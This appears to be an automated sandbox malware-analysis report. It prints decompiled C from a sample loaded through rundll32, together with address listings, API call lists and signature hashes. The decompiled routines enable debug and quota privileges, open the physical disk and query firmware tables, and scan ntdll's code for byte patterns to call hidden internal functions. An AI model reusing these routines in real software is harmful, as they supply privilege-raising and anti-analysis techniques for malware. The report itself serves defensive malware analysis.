                                                                                              0x0426692a
                                                                                              0x0426692d
                                                                                              0x0426692d
                                                                                              0x04266936
                                                                                              0x0426693c
                                                                                              0x04266941
                                                                                              0x04266943
                                                                                              0x04266948
                                                                                              0x04266950
                                                                                              0x04266950
                                                                                              0x04266952
                                                                                              0x04266953
                                                                                              0x0426695e
                                                                                              0x04266960
                                                                                              0x04266960
                                                                                              0x04266963
                                                                                              0x04266968
                                                                                              0x0426696a
                                                                                              0x0426696f
                                                                                              0x04266972
                                                                                              0x04266972
                                                                                              0x04266974
                                                                                              0x04266975
                                                                                              0x04266980
                                                                                              0x04266982
                                                                                              0x04266982
                                                                                              0x04266985
                                                                                              0x0426698a
                                                                                              0x0426698c
                                                                                              0x04266991
                                                                                              0x04266994
                                                                                              0x04266994
                                                                                              0x04266996
                                                                                              0x04266997
                                                                                              0x042669a2
                                                                                              0x042669a4
                                                                                              0x042669a4
                                                                                              0x042669a7
                                                                                              0x042669ac
                                                                                              0x042669ae
                                                                                              0x042669b0
                                                                                              0x042669b3
                                                                                              0x042669b3
                                                                                              0x042669b5
                                                                                              0x042669b6
                                                                                              0x042669bd
                                                                                              0x042669c0
                                                                                              0x042669c0
                                                                                              0x042669c2
                                                                                              0x042669c2
                                                                                              0x042669ac
                                                                                              0x042669c5
                                                                                              0x042669c8
                                                                                              0x042669c9
                                                                                              0x042669d1
                                                                                              0x042669d3
                                                                                              0x042669d6
                                                                                              0x042669db
                                                                                              0x04266b36
                                                                                              0x04266b36
                                                                                              0x042669e1
                                                                                              0x042669e7
                                                                                              0x042669ec
                                                                                              0x042669ef
                                                                                              0x042669f5
                                                                                              0x042669f9
                                                                                              0x042669fb
                                                                                              0x04266a00
                                                                                              0x04266a03
                                                                                              0x04266a09
                                                                                              0x04266a0b
                                                                                              0x04266a0e
                                                                                              0x04266a13
                                                                                              0x04266a15
                                                                                              0x04266a18
                                                                                              0x04266a1a
                                                                                              0x04266a20
                                                                                              0x04266a20
                                                                                              0x04266a22
                                                                                              0x04266a25
                                                                                              0x04266a29
                                                                                              0x04266a2d
                                                                                              0x04266a30
                                                                                              0x04266a30
                                                                                              0x04266a33
                                                                                              0x04266a33
                                                                                              0x04266a35
                                                                                              0x04266a36
                                                                                              0x04266a3c
                                                                                              0x04266a3c
                                                                                              0x04266a3f
                                                                                              0x04266a3f
                                                                                              0x04266a44
                                                                                              0x00000000
                                                                                              0x04266a4a
                                                                                              0x04266a4e
                                                                                              0x04266a51
                                                                                              0x04266a53
                                                                                              0x04266a59
                                                                                              0x04266a5b
                                                                                              0x04266a60
                                                                                              0x04266a60
                                                                                              0x04266a62
                                                                                              0x04266a65
                                                                                              0x04266a67
                                                                                              0x04266a6a
                                                                                              0x04266a71
                                                                                              0x04266a73
                                                                                              0x04266a76
                                                                                              0x04266a76
                                                                                              0x04266a78
                                                                                              0x04266a79
                                                                                              0x04266a82
                                                                                              0x04266a86
                                                                                              0x04266a88
                                                                                              0x04266a88
                                                                                              0x04266a8f
                                                                                              0x04266a91
                                                                                              0x04266a97
                                                                                              0x04266a99
                                                                                              0x04266aa0
                                                                                              0x04266aa0
                                                                                              0x04266aa2
                                                                                              0x04266aa5
                                                                                              0x04266aa7
                                                                                              0x04266aaa
                                                                                              0x04266ab1
                                                                                              0x04266ab3
                                                                                              0x04266ab6
                                                                                              0x04266ab6
                                                                                              0x04266ab8
                                                                                              0x04266ab9
                                                                                              0x04266ac3
                                                                                              0x04266ac5
                                                                                              0x04266ac5
                                                                                              0x04266acc
                                                                                              0x04266acf
                                                                                              0x04266b12
                                                                                              0x04266ad1
                                                                                              0x04266ad1
                                                                                              0x04266ad4
                                                                                              0x04266ada
                                                                                              0x04266ae0
                                                                                              0x04266ae0
                                                                                              0x04266ae2
                                                                                              0x04266ae5
                                                                                              0x04266ae7
                                                                                              0x04266aea
                                                                                              0x04266af1
                                                                                              0x04266af4
                                                                                              0x04266af9
                                                                                              0x04266b00
                                                                                              0x04266b00
                                                                                              0x04266b02
                                                                                              0x04266b03
                                                                                              0x04266b0e
                                                                                              0x04266b0e
                                                                                              0x04266b19
                                                                                              0x04266b1b
                                                                                              0x04266b21
                                                                                              0x04266b23
                                                                                              0x04266b26
                                                                                              0x04266b26
                                                                                              0x04266b28
                                                                                              0x04266b2b
                                                                                              0x04266b2d
                                                                                              0x04266b30
                                                                                              0x04266b34
                                                                                              0x04266b19
                                                                                              0x04266a44
                                                                                              0x04266b39
                                                                                              0x04266b3e
                                                                                              0x04266b41
                                                                                              0x04266b46
                                                                                              0x04266b46
                                                                                              0x04266b49
                                                                                              0x04266b4e
                                                                                              0x04266b51
                                                                                              0x04266b56
                                                                                              0x04266b6d

                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemFirmwareTable,?,00000000), ref: 042667C6
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 042667CD
                                                                                              • CreateFileA.KERNEL32(\\.\PhysicalDrive0,80000000,00000003,00000000,00000003,00000000,00000000), ref: 042668D2
                                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00002000,?,00000000), ref: 042668F9
                                                                                              • CloseHandle.KERNEL32(?), ref: 04266908
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Handle$AddressCloseControlCreateDeviceFileModuleProc
                                                                                              • String ID: GetSystemFirmwareTable$\\.\PhysicalDrive0$kernel32
                                                                                              • API String ID: 2970610107-3170356133
                                                                                              • Opcode ID: d94e460b6c121fa85fc2b5c6b2498510d81fa7f4fdb6f72c4bdd6af2aac77e5e
                                                                                              • Instruction ID: 78651dfca7913e07d8007a5d234879cdbb4bc5e56f68c336548d6cb3fbe28d82
                                                                                              • Opcode Fuzzy Hash: d94e460b6c121fa85fc2b5c6b2498510d81fa7f4fdb6f72c4bdd6af2aac77e5e
                                                                                              • Instruction Fuzzy Hash: 8AE1B274B142069FDF15CF68D850AEDFBF1BF49304F18825DD846AB241EB32A986CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 85%
                                                                                              			E0426AC90(WCHAR* __ecx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				struct _TOKEN_PRIVILEGES _v24;
                                                                                              				void* _v28;
                                                                                              				signed int _t11;
                                                                                              				void* _t22;
                                                                                              				WCHAR* _t32;
                                                                                              				signed int _t36;
                                                                                              
                                                                                              				_t11 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t11 ^ _t36;
                                                                                              				_t32 = __ecx;
                                                                                              				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                              					_v24.PrivilegeCount = 1;
                                                                                              					_v12 = 2;
                                                                                              					LookupPrivilegeValueW(0, _t32,  &(_v24.Privileges));
                                                                                              					AdjustTokenPrivileges(_v28, 0,  &_v24, 0x10, 0, 0);
                                                                                              					GetLastError();
                                                                                              					_t35 =  !=  ? 0 : 1;
                                                                                              					CloseHandle(_v28);
                                                                                              					_t22 =  !=  ? 0 : 1;
                                                                                              					return E04275AFE(_v8 ^ _t36);
                                                                                              				} else {
                                                                                              					return E04275AFE(_v8 ^ _t36);
                                                                                              				}
                                                                                              			}











                                                                                              0x0426ac96
                                                                                              0x0426ac9d
                                                                                              0x0426aca5
                                                                                              0x0426acbe
                                                                                              0x0426acd3
                                                                                              0x0426acda
                                                                                              0x0426ace1
                                                                                              0x0426acf6
                                                                                              0x0426acfc
                                                                                              0x0426ad09
                                                                                              0x0426ad0c
                                                                                              0x0426ad15
                                                                                              0x0426ad23
                                                                                              0x0426acc2
                                                                                              0x0426accf
                                                                                              0x0426accf

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000000,00000000,?,?,04269E8E), ref: 0426ACAF
                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,04269E8E), ref: 0426ACB6
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,04269E8E), ref: 0426ACE1
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,04269E8E), ref: 0426ACF6
                                                                                              • GetLastError.KERNEL32(?,?,04269E8E), ref: 0426ACFC
                                                                                              • CloseHandle.KERNEL32(?,?,?,04269E8E), ref: 0426AD0C
                                                                                              Strings
                                                                                              • SeIncreaseQuotaPrivilege, xrefs: 0426ACD7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                              • String ID: SeIncreaseQuotaPrivilege
                                                                                              • API String ID: 3398352648-3255188008
                                                                                              • Opcode ID: 5b2f0d2446c27cdec1aeb830d5fdf0b03c2149018b03a97aa4f5477c20871a30
                                                                                              • Instruction ID: 094b167f281762830a8a65300896e8c8694d97d131df06b16c06ffe0c981d6be
                                                                                              • Opcode Fuzzy Hash: 5b2f0d2446c27cdec1aeb830d5fdf0b03c2149018b03a97aa4f5477c20871a30
                                                                                              • Instruction Fuzzy Hash: B4116572B00209AFDB14AFA8EC4EBBEBBB8EF45711F500169E906E6180DE756D458790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 85%
                                                                                              			E0426AD30(void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				struct _TOKEN_PRIVILEGES _v24;
                                                                                              				void* _v28;
                                                                                              				signed int _t11;
                                                                                              				void* _t22;
                                                                                              				signed int _t33;
                                                                                              
                                                                                              				_t11 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t11 ^ _t33;
                                                                                              				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                              					_v24.PrivilegeCount = 1;
                                                                                              					_v12 = 2;
                                                                                              					LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &(_v24.Privileges));
                                                                                              					AdjustTokenPrivileges(_v28, 0,  &_v24, 0x10, 0, 0);
                                                                                              					GetLastError();
                                                                                              					_t32 =  !=  ? 0 : 1;
                                                                                              					CloseHandle(_v28);
                                                                                              					_t22 =  !=  ? 0 : 1;
                                                                                              					return E04275AFE(_v8 ^ _t33);
                                                                                              				} else {
                                                                                              					return E04275AFE(_v8 ^ _t33);
                                                                                              				}
                                                                                              			}










                                                                                              0x0426ad36
                                                                                              0x0426ad3d
                                                                                              0x0426ad5b
                                                                                              0x0426ad6f
                                                                                              0x0426ad7a
                                                                                              0x0426ad81
                                                                                              0x0426ad96
                                                                                              0x0426ad9c
                                                                                              0x0426ada9
                                                                                              0x0426adac
                                                                                              0x0426adb5
                                                                                              0x0426adc2
                                                                                              0x0426ad5e
                                                                                              0x0426ad6b
                                                                                              0x0426ad6b

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,ntdll.dll,76A20320,00000000,?), ref: 0426AD4C
                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,ntdll.dll,76A20320,00000000,?), ref: 0426AD53
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0426AD81
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,?,ntdll.dll,76A20320), ref: 0426AD96
                                                                                              • GetLastError.KERNEL32(?,?,?,ntdll.dll,76A20320), ref: 0426AD9C
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,ntdll.dll,76A20320), ref: 0426ADAC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                              • String ID: SeDebugPrivilege
                                                                                              • API String ID: 3398352648-2896544425
                                                                                              • Opcode ID: cd34b84001d9343fb058a3c77e2b83a92cbcff8a715d7415f46e9c4c15e58cd6
                                                                                              • Instruction ID: d648b580139d6a2738fa5fda068f8c94f1cbd852615bebe64326e04d1c83b12d
                                                                                              • Opcode Fuzzy Hash: cd34b84001d9343fb058a3c77e2b83a92cbcff8a715d7415f46e9c4c15e58cd6
                                                                                              • Instruction Fuzzy Hash: 05018871B00209ABDB14AFA8EC4EBBEBBB8EF04711F100069F906E6180DE746D448790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 26%
                                                                                              			E0425C560(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                              				signed int _v8;
                                                                                              				short _v12;
                                                                                              				char _v14;
                                                                                              				short _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				short _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				intOrPtr _v296;
                                                                                              				intOrPtr _v300;
                                                                                              				intOrPtr _v304;
                                                                                              				char _v308;
                                                                                              				intOrPtr _v312;
                                                                                              				intOrPtr _v316;
                                                                                              				intOrPtr _v320;
                                                                                              				intOrPtr _v324;
                                                                                              				signed int _t101;
                                                                                              				_Unknown_base(*)()* _t108;
                                                                                              				void* _t113;
                                                                                              				intOrPtr _t114;
                                                                                              				intOrPtr _t115;
                                                                                              				void* _t139;
                                                                                              				intOrPtr* _t140;
                                                                                              				intOrPtr* _t150;
                                                                                              				intOrPtr* _t153;
                                                                                              				intOrPtr* _t157;
                                                                                              				void* _t158;
                                                                                              				void* _t160;
                                                                                              				void* _t161;
                                                                                              				void* _t162;
                                                                                              				void* _t169;
                                                                                              				void* _t170;
                                                                                              				intOrPtr _t175;
                                                                                              				void* _t176;
                                                                                              				void* _t182;
                                                                                              				intOrPtr* _t188;
                                                                                              				signed int _t189;
                                                                                              				void* _t191;
                                                                                              				void* _t197;
                                                                                              				intOrPtr _t198;
                                                                                              				void* _t200;
                                                                                              				void* _t202;
                                                                                              				void* _t203;
                                                                                              				void* _t205;
                                                                                              				void* _t209;
                                                                                              				void* _t211;
                                                                                              				void* _t214;
                                                                                              				void* _t217;
                                                                                              				struct HINSTANCE__* _t220;
                                                                                              				void* _t221;
                                                                                              				void* _t222;
                                                                                              				void* _t223;
                                                                                              				void* _t224;
                                                                                              				void* _t225;
                                                                                              				void* _t226;
                                                                                              				signed int _t227;
                                                                                              
                                                                                              				_t197 = __edi;
                                                                                              				_t101 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t101 ^ _t227;
                                                                                              				_v324 = _a4;
                                                                                              				_v316 = _a8;
                                                                                              				_t220 = GetModuleHandleA("ntdll");
                                                                                              				if(_t220 == 0) {
                                                                                              					L91:
                                                                                              					return E04275AFE(_v8 ^ _t227);
                                                                                              				} else {
                                                                                              					E0427DEA0(__edi,  &_v308, 0, 0x114);
                                                                                              					_t108 = GetProcAddress(_t220, "RtlGetVersion");
                                                                                              					if(_t108 == 0) {
                                                                                              						goto L91;
                                                                                              					} else {
                                                                                              						_push( &_v308);
                                                                                              						if( *_t108() != 0 || _t220->i != 0x5a4d) {
                                                                                              							goto L91;
                                                                                              						} else {
                                                                                              							_t188 =  *((intOrPtr*)(_t220 + 0x3c)) + _t220;
                                                                                              							if( *_t188 != 0x4550) {
                                                                                              								goto L91;
                                                                                              							} else {
                                                                                              								_t157 = 0;
                                                                                              								_t113 = ( *(_t188 + 0x14) & 0x0000ffff) + 0x18 + _t188;
                                                                                              								_t189 =  *(_t188 + 6) & 0x0000ffff;
                                                                                              								if(_t189 == 0) {
                                                                                              									goto L91;
                                                                                              								} else {
                                                                                              									while(( *(_t113 + 0x24) & 0x20000000) == 0) {
                                                                                              										_t157 = _t157 + 1;
                                                                                              										_t113 = _t113 + 0x28;
                                                                                              										if(_t157 < _t189) {
                                                                                              											continue;
                                                                                              										} else {
                                                                                              											return E04275AFE(_v8 ^ _t227);
                                                                                              										}
                                                                                              										goto L92;
                                                                                              									}
                                                                                              									_push(_t197);
                                                                                              									_t198 =  *((intOrPtr*)(_t113 + 0x10));
                                                                                              									_v320 = _t198;
                                                                                              									_t191 =  *((intOrPtr*)(_t113 + 0xc)) + _t220;
                                                                                              									if(_t191 == 0 || _t198 == 0) {
                                                                                              										L90:
                                                                                              										goto L91;
                                                                                              									} else {
                                                                                              										_t114 = _v304;
                                                                                              										if(_t114 != 0xa) {
                                                                                              											if(_t114 != 6) {
                                                                                              												goto L90;
                                                                                              											} else {
                                                                                              												_t115 = _v300;
                                                                                              												if(_t115 == 3) {
                                                                                              													goto L35;
                                                                                              												} else {
                                                                                              													if(_t115 != 2) {
                                                                                              														if(_t115 != 1) {
                                                                                              															goto L90;
                                                                                              														} else {
                                                                                              															_t223 = 0;
                                                                                              															_v20 = 0x8b55ff8b;
                                                                                              															_v16 = 0x56ec;
                                                                                              															_t203 = _t198 + 0xfffffff9;
                                                                                              															_v14 = 0x68;
                                                                                              															_v312 = 0x38e05d89;
                                                                                              															do {
                                                                                              																_t161 = 0;
                                                                                              																while( *((intOrPtr*)(_t161 + _t223 + _t191)) ==  *((intOrPtr*)(_t227 + _t161 - 0x10))) {
                                                                                              																	_t161 = _t161 + 1;
                                                                                              																	if(_t161 < 7) {
                                                                                              																		continue;
                                                                                              																	}
                                                                                              																	break;
                                                                                              																}
                                                                                              																if(_t161 == 7) {
                                                                                              																	_t153 = _t223 + _t191;
                                                                                              																	if(_t153 == 0) {
                                                                                              																		goto L90;
                                                                                              																	} else {
                                                                                              																		_t224 = 0;
                                                                                              																		_t205 = _v320 + 0xfffffffc;
                                                                                              																		do {
                                                                                              																			_t162 = 0;
                                                                                              																			while( *((intOrPtr*)(_t162 + _t224 + _t191)) ==  *((intOrPtr*)(_t227 + _t162 - 0x134))) {
                                                                                              																				_t162 = _t162 + 1;
                                                                                              																				if(_t162 < 4) {
                                                                                              																					continue;
                                                                                              																				}
                                                                                              																				break;
                                                                                              																			}
                                                                                              																			if(_t162 == 4) {
                                                                                              																				goto L76;
                                                                                              																			} else {
                                                                                              																				goto L74;
                                                                                              																			}
                                                                                              																			goto L92;
                                                                                              																			L74:
                                                                                              																			_t224 = _t224 + 1;
                                                                                              																		} while (_t224 <= _t205);
                                                                                              																		return E04275AFE(_v8 ^ _t227);
                                                                                              																	}
                                                                                              																} else {
                                                                                              																	goto L66;
                                                                                              																}
                                                                                              																goto L92;
                                                                                              																L66:
                                                                                              																_t223 = _t223 + 1;
                                                                                              															} while (_t223 <= _t203);
                                                                                              															return E04275AFE(_v8 ^ _t227);
                                                                                              														}
                                                                                              													} else {
                                                                                              														_t225 = 0;
                                                                                              														_v20 = 0x8b55ff8b;
                                                                                              														_v16 = 0x56ec;
                                                                                              														_t209 = _t198 + 0xfffffff9;
                                                                                              														_v14 = 0x68;
                                                                                              														_v312 = 0x38e05d89;
                                                                                              														do {
                                                                                              															_t169 = 0;
                                                                                              															asm("o16 nop [eax+eax]");
                                                                                              															while( *((intOrPtr*)(_t169 + _t225 + _t191)) ==  *((intOrPtr*)(_t227 + _t169 - 0x10))) {
                                                                                              																_t169 = _t169 + 1;
                                                                                              																if(_t169 < 7) {
                                                                                              																	continue;
                                                                                              																}
                                                                                              																break;
                                                                                              															}
                                                                                              															if(_t169 == 7) {
                                                                                              																_t153 = _t225 + _t191;
                                                                                              																if(_t153 == 0) {
                                                                                              																	goto L90;
                                                                                              																} else {
                                                                                              																	_t224 = 0;
                                                                                              																	_t211 = _v320 + 0xfffffffc;
                                                                                              																	do {
                                                                                              																		_t170 = 0;
                                                                                              																		asm("o16 nop [eax+eax]");
                                                                                              																		while( *((intOrPtr*)(_t170 + _t224 + _t191)) ==  *((intOrPtr*)(_t227 + _t170 - 0x134))) {
                                                                                              																			_t170 = _t170 + 1;
                                                                                              																			if(_t170 < 4) {
                                                                                              																				continue;
                                                                                              																			}
                                                                                              																			break;
                                                                                              																		}
                                                                                              																		if(_t170 == 4) {
                                                                                              																			L76:
                                                                                              																			_t125 =  *((intOrPtr*)(_t224 + _t191 + 0x1b));
                                                                                              																			if( *((intOrPtr*)(_t224 + _t191 + 0x1b)) == 0) {
                                                                                              																				goto L90;
                                                                                              																			} else {
                                                                                              																				 *_t153(_v324,  *((intOrPtr*)(_v316 + 0x50)));
                                                                                              																				return E04275AFE(_v8 ^ _t227, _t125);
                                                                                              																			}
                                                                                              																		} else {
                                                                                              																			goto L58;
                                                                                              																		}
                                                                                              																		goto L92;
                                                                                              																		L58:
                                                                                              																		_t224 = _t224 + 1;
                                                                                              																	} while (_t224 <= _t211);
                                                                                              																	return E04275AFE(_v8 ^ _t227);
                                                                                              																}
                                                                                              															} else {
                                                                                              																goto L50;
                                                                                              															}
                                                                                              															goto L92;
                                                                                              															L50:
                                                                                              															_t225 = _t225 + 1;
                                                                                              														} while (_t225 <= _t209);
                                                                                              														return E04275AFE(_v8 ^ _t227);
                                                                                              													}
                                                                                              												}
                                                                                              											}
                                                                                              										} else {
                                                                                              											if(_v300 != 0) {
                                                                                              												goto L90;
                                                                                              											} else {
                                                                                              												_t175 = _v296;
                                                                                              												if(_t175 < 0x3fab) {
                                                                                              													if(_t175 - 0x3ad7 > 0x4d3) {
                                                                                              														if(_t175 < 0x3ad7) {
                                                                                              															L35:
                                                                                              															_t150 = 0;
                                                                                              															_v20 = 0x8b575653;
                                                                                              															_t221 = 0;
                                                                                              															_v16 = 0x50f98bda;
                                                                                              															_v32 = 0x89f4458d;
                                                                                              															_t200 = _t198 + 0xfffffff8;
                                                                                              															_v28 = 0x8d50f855;
                                                                                              															_v24 = 0xfc55;
                                                                                              															do {
                                                                                              																_t158 = 0;
                                                                                              																while( *((intOrPtr*)(_t158 + _t221 + _t191)) ==  *((intOrPtr*)(_t227 + _t158 - 0x10))) {
                                                                                              																	_t158 = _t158 + 1;
                                                                                              																	if(_t158 < 8) {
                                                                                              																		continue;
                                                                                              																	}
                                                                                              																	break;
                                                                                              																}
                                                                                              																if(_t158 == 8) {
                                                                                              																	_t150 = _t191 - 0xb + _t221;
                                                                                              																} else {
                                                                                              																	goto L40;
                                                                                              																}
                                                                                              																L79:
                                                                                              																if(_t150 != 0) {
                                                                                              																	L89:
                                                                                              																	 *_t150();
                                                                                              																} else {
                                                                                              																	_t222 = 0;
                                                                                              																	_t202 = _v320 + 0xfffffff6;
                                                                                              																	do {
                                                                                              																		_t160 = 0;
                                                                                              																		while( *((intOrPtr*)(_t160 + _t222 + _t191)) ==  *((intOrPtr*)(_t227 + _t160 - 0x1c))) {
                                                                                              																			_t160 = _t160 + 1;
                                                                                              																			if(_t160 < 0xa) {
                                                                                              																				continue;
                                                                                              																			}
                                                                                              																			break;
                                                                                              																		}
                                                                                              																		if(_t160 == 0xa) {
                                                                                              																			_t150 = _t191 - 0xb + _t222;
                                                                                              																		} else {
                                                                                              																			goto L85;
                                                                                              																		}
                                                                                              																		L88:
                                                                                              																		if(_t150 != 0) {
                                                                                              																			goto L89;
                                                                                              																		}
                                                                                              																		goto L90;
                                                                                              																		L85:
                                                                                              																		_t222 = _t222 + 1;
                                                                                              																	} while (_t222 <= _t202);
                                                                                              																	goto L88;
                                                                                              																}
                                                                                              																goto L90;
                                                                                              																L40:
                                                                                              																_t221 = _t221 + 1;
                                                                                              															} while (_t221 <= _t200);
                                                                                              															goto L79;
                                                                                              														}
                                                                                              														goto L90;
                                                                                              													} else {
                                                                                              														_t226 = 0;
                                                                                              														_v20 = 0x89f0458d;
                                                                                              														_v16 = 0x8d50f855;
                                                                                              														_t214 = _t198 + 0xfffffff6;
                                                                                              														_v12 = 0xf455;
                                                                                              														do {
                                                                                              															_t176 = 0;
                                                                                              															while( *((intOrPtr*)(_t176 + _t226 + _t191)) ==  *((intOrPtr*)(_t227 + _t176 - 0x10))) {
                                                                                              																_t176 = _t176 + 1;
                                                                                              																if(_t176 < 0xa) {
                                                                                              																	continue;
                                                                                              																}
                                                                                              																break;
                                                                                              															}
                                                                                              															if(_t176 == 0xa) {
                                                                                              																_t139 = _t191 - 0xb;
                                                                                              																goto L32;
                                                                                              															} else {
                                                                                              																goto L29;
                                                                                              															}
                                                                                              															goto L92;
                                                                                              															L29:
                                                                                              															_t226 = _t226 + 1;
                                                                                              														} while (_t226 <= _t214);
                                                                                              														return E04275AFE(_v8 ^ _t227);
                                                                                              													}
                                                                                              												} else {
                                                                                              													_t226 = 0;
                                                                                              													_v20 = 0x8d575653;
                                                                                              													_v16 = 0xfa8bf845;
                                                                                              													_t217 = _t198 + 0xfffffff8;
                                                                                              													do {
                                                                                              														_t182 = 0;
                                                                                              														while( *((intOrPtr*)(_t182 + _t226 + _t191)) ==  *((intOrPtr*)(_t227 + _t182 - 0x10))) {
                                                                                              															_t182 = _t182 + 1;
                                                                                              															if(_t182 < 8) {
                                                                                              																continue;
                                                                                              															}
                                                                                              															break;
                                                                                              														}
                                                                                              														if(_t182 == 8) {
                                                                                              															_t139 = _t191 - 8;
                                                                                              															L32:
                                                                                              															_t140 = _t139 + _t226;
                                                                                              															if(_t140 == 0) {
                                                                                              																goto L90;
                                                                                              															} else {
                                                                                              																 *_t140();
                                                                                              																return E04275AFE(_v8 ^ _t227);
                                                                                              															}
                                                                                              														} else {
                                                                                              															goto L20;
                                                                                              														}
                                                                                              														goto L92;
                                                                                              														L20:
                                                                                              														_t226 = _t226 + 1;
                                                                                              													} while (_t226 <= _t217);
                                                                                              													return E04275AFE(_v8 ^ _t227);
                                                                                              												}
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				L92:
                                                                                              			}



























































                                                                                              0x0425c560
                                                                                              0x0425c569
                                                                                              0x0425c570
                                                                                              0x0425c580
                                                                                              0x0425c586
                                                                                              0x0425c592
                                                                                              0x0425c596
                                                                                              0x0425c99e
                                                                                              0x0425c9ad
                                                                                              0x0425c59c
                                                                                              0x0425c5aa
                                                                                              0x0425c5b8
                                                                                              0x0425c5c0
                                                                                              0x00000000
                                                                                              0x0425c5c6
                                                                                              0x0425c5cc
                                                                                              0x0425c5d1
                                                                                              0x00000000
                                                                                              0x0425c5e5
                                                                                              0x0425c5e8
                                                                                              0x0425c5f0
                                                                                              0x00000000
                                                                                              0x0425c5f6
                                                                                              0x0425c5fa
                                                                                              0x0425c5ff
                                                                                              0x0425c601
                                                                                              0x0425c607
                                                                                              0x00000000
                                                                                              0x0425c610
                                                                                              0x0425c610
                                                                                              0x0425c619
                                                                                              0x0425c61a
                                                                                              0x0425c61f
                                                                                              0x00000000
                                                                                              0x0425c623
                                                                                              0x0425c630
                                                                                              0x0425c630
                                                                                              0x00000000
                                                                                              0x0425c61f
                                                                                              0x0425c636
                                                                                              0x0425c637
                                                                                              0x0425c63a
                                                                                              0x0425c640
                                                                                              0x0425c642
                                                                                              0x0425c99d
                                                                                              0x00000000
                                                                                              0x0425c650
                                                                                              0x0425c650
                                                                                              0x0425c659
                                                                                              0x0425c7ab
                                                                                              0x00000000
                                                                                              0x0425c7b1
                                                                                              0x0425c7b1
                                                                                              0x0425c7ba
                                                                                              0x00000000
                                                                                              0x0425c7bc
                                                                                              0x0425c7bf
                                                                                              0x0425c879
                                                                                              0x00000000
                                                                                              0x0425c87f
                                                                                              0x0425c87f
                                                                                              0x0425c881
                                                                                              0x0425c888
                                                                                              0x0425c88e
                                                                                              0x0425c891
                                                                                              0x0425c895
                                                                                              0x0425c8a0
                                                                                              0x0425c8a0
                                                                                              0x0425c8a2
                                                                                              0x0425c8ae
                                                                                              0x0425c8b2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425c8b2
                                                                                              0x0425c8b7
                                                                                              0x0425c8d1
                                                                                              0x0425c8d6
                                                                                              0x00000000
                                                                                              0x0425c8dc
                                                                                              0x0425c8e2
                                                                                              0x0425c8e4
                                                                                              0x0425c8e7
                                                                                              0x0425c8e7
                                                                                              0x0425c8f0
                                                                                              0x0425c8ff
                                                                                              0x0425c903
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425c903
                                                                                              0x0425c908
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425c90a
                                                                                              0x0425c90a
                                                                                              0x0425c90b
                                                                                              0x0425c91f
                                                                                              0x0425c91f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425c8b9
                                                                                              0x0425c8b9
                                                                                              0x0425c8ba
                                                                                              0x0425c8ce
